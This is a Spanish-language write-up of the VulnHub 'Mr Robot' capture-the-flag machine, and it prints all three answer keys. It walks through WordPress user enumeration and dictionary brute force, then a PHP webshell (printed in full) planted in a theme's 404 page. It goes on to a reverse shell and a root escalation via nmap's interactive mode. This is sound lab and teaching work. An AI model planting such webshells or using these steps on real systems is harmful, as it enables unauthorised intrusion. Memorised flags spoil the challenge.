Gracias a mi compaero David (@DaveLanis) he conocido una mquina virtual de la serie MR

Robot a modo de reto, en la que tienes que encontrar tres keys. Segn puedes ver aqu, el reto
dicen que es para nivel novato-intermedio, pero si ests dispuesto a pasar un rato investigando,
te la recomiendo. Siempre se aprende algo.
Antes de nada decir, que no soy muy asiduo a este tipo de retos, as que lo mismo la resolucin
que yo os dejo no es ni la mejor, ni la ms rpida.
Dicho esto, lo primero es descargar la mquina que est en formato OVA y que puedes usar de
manera gratuita con, por ejemplo, VirtualBox. Una vez que tienes la mquina arrancada, lo
primero que vemos es esto.

Como no disponemos del login de la mquina, lo primero que pens es tirarle un nmap para ver
que tena levantado la mquina. Cierto es que se me pas por la cabeza saltarme el grub, pero
pens que quiz le quitaba la gracia xD.

Como vemos en la imagen, el puerto 80 y el 443 estn abiertos y el 22 est cerrado.

Lo siguiente fue abrir un navegador y poner la IP de la mquina. Al abrir parece que carga un
sistema operativo y te da unas opciones para introducir.

Tengo que decir que me encanta el texto que pone al abrir la web xD.
Despus de revisar una por una cada opcin y ver que hay en la parte del cdigo (y de no
encontrar nada llamativo) decid abrir Burp y ver que haba en las peticiones y que poda
encontrar. Un poco de spider y me topo con el robots.txt.

En el aparecen dos archivos como podemos ver en la imagen anterior. Vamos al navegador y
ponemos la IP de la mquina ms los ficheros encontrados. En uno nos da un hash y en el otro
un diccionario.

En un principio pens que el diccionario era para crackear el hash, pero despus de tirarle John
the ripper y hashcat como hice en otra entrada y ver que no sacaba nada, pens que la primera
key era simplemente eso una clave 073403c8a58a1f80d943455fb30724b9.
Seguimos avanzando y me da por mirar de nuevo el cdigo de una de las pginas y me doy
cuenta de que corre un WordPress.

Sabiendo que hay un WordPress, voy a probar que tiene con WPScan.

Pues a priori nada que no supiera ya

Vamos a la parte del login de WordPress a ver si nos da una pista

Y efectivamente tenemos algo, podemos enumerar usuarios. Ya tenemos que el usuario elliot
existe. Me preguntaba David que porqu el usuario Elliot y la verdad es que me sali solo, pens
que es el prota de la serie y simplemente lo puse por poner.
Volvemos a WPScan para probar un ataque por diccionario con la lista que hemos obtenido y el
usuario elliot.

Pues parece que esta herramienta funciona bien jeje, un 10 para estos chicos!!
Ya tenemos acceso a la parte privada de WordPress.

Como tengo permisos de administrador me voy a pegar un buen vistazo a todo lo que hay
dentro.

Adems del usuario de Elliot, existe otro llamado mich05654 que es de Krista Gordon. Siendo
sincero, he tenido que buscar quien era porque con los nombres en las series en ingls tengo un
serio problema, y es, que no me acuerdo de los nombres de los personajes xD. Resulta que es la
psicloga de Elliot (algo bastante llamativo).
Sigo revisando todo y me encuentro en la parte de plugins con uno que me llama la atencin
hello Dolly no me suena absolutamente de nada, no es que sea un experto en WordPress ni
mucho menos, pero s que me suenan los nombre de los plugins ms conocidos. De hecho si
vemos la siguiente imagen ellos mismos dicen que no es un plugin al uso

SI busco en google por el nombre del citado plugin veo esto.

Veamos el cdigo a ver si hay algo.

Pues parece que lo nico que hace este plugin es mostrar una frase aleatoria de la cancin de
Louis Amstrong, as que me da que por ah no van los tiros.
He de reconocer que pensaba que habra alguna pista en ese plugin y la verdad que me quedo
bastante atascado en este punto, de hecho demasiado. Pierdo ms de dos horas revisando todo
lo que hay en el WordPress sin llegar a nada (recordemos que no soy asiduo a estos juegos jeje).
No s por dnde seguir, as que me vuelvo loco mirando de nuevo el frontal, el cdigo de todas
las pginas e incluso me dar por ver si hay algo de steno en las imgenes, y nada. La verdad que
cuando no ests acostumbrado a este tipo de juegos es bastante frustrante quedarte atascado
y no poder avanzar.

Despus de mucho darle vueltas y de hablar con David, se me ocurri (por una vez he pensado)
intentar modificar el contenido de uno de los plugins por un simple phpinfo y ver si lo poda
llamar. Al segundo intento funcion.
La idea (ahora) era sencilla. Modificar la pgina de error para que en lugar de cargar el contenido
por defecto me muestre el phpinfo.

Y as al poner cualquier cosa en el navegador no esperada, en lugar de cargar la pgina de error

404.php, nos carga el phpinfo.

Ahora, sabiendo que funciona, cambiamos ese phpinfo por una minishell.
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>

Y vemos quienes somos, listamos ficheros etc.

Como esto es una pequea webshell, no nos da para mucho, necesitamos algo que nos aporte
algo ms. Mis compaero Amine (gracias por tu tiempo) me estuvo hablando de Regeorg y la
verdad que es bastante potente, pero para este reto creo que era demasiado, as que estuve
buscando shells reversas en PHP y me top con la gente de pentestmonkey (recomiendo
bastante su blog) donde encontr varios recursos que me han venido bien para terminar esta
prueba.
Total, que subo la Shell, modifico los parmetros de IP y puerto y me lio con ello. Para este
ejemplo yo me abr el puerto 2222 contra la IP de la mquina desde la que quiero obtener
acceso, es decir, subo la webshell al WordPress y abro un netcat a la escucha en la Kali.

Perfecto, ya tengo conexin en la mquina. Vamos a ver algunas cosas

Como vemos en la imagen anterior, tengo dos ficheros pero solo puedo leer uno de ellos, para
el otro necesito ser el usuario robot. El hash del segundo fichero parece ser la clave para el
usuario root, podra intentar crackear el hash como hice en la entrada con los hash MD5, pero
ya haba perdido mucho tiempo, as que me fui a lo fcil, poner en google el hash y esperar la
respuesta jeje.

Rsulta que la contrasea del usuario robot es el abecedario xD. Ya puedo acceder con el usuario
haciendo sudo y listo no?

Pues se ve que no, otra complicacin ms y a buscar info. Mirando de nuevo en google por el
nombre del error me encuentro que usando Python tengo la solucin.

Ya tengo acceso, ahora s!

Con esto ya tenemos el segundo flag, 822c73956184f694993bede3eb39f959. Vamos a por el

tercero. Para esta necesitamos ser root, es decir, hay que elevar privilegios. Despus de marear
la perdiz y buscar 654837 cosas sobre como elevar privilegios, me acord que hace poco en una
mquina lo pude hacer a travs de Nmap. As que lo primero es comprobar que est instalado
nmap.

Pues va a ser que s, esto est hecho!!

En 3 pasos somos root. Nmap tiene una opcin que es --interactive con la que puedes abrirte
una Shell como root y, obviamente todo lo que hagas se ejecuta como root.

Ya tenemos el tercer y ltimo flag. Creo que ha sido el ms fcil y rpido sin duda.

Conclusiones:
Desde mi punto de vista lo ms difcil ha sido empezar y pensar como subir una webshell.
Agradecimientos:
A mis compaeros David, Amine y Hector.
A la persona que ha desarrollado este wargame por el curro que lleva.
Recursos:
http://pentestmonkey.net/
https://www.vulnhub.com/entry/mr-robot-1,151/
Por ltimo, las key que se piden en el juego:
1: 073403c8a58a1f80d943455fb30724b9
2: 822c73956184f694993bede3eb39f959
3: 04787ddef27c3dee1ee161b21670b4e4
*Plus: David Alans (@DaveLanis) ha encontrado la pass de Elliot sin tener que hacer fuerza
bruta ni nada xD:
Si accedes a http://IP_delamaquina/license.txt y bajas con el cursor te la encuentras en
base64, la decodeas y listo.

Writeup escrito por Roberto Garca Amoriz (@1GbDeInfo) visita mi web en http://www.1gbdeinfo.com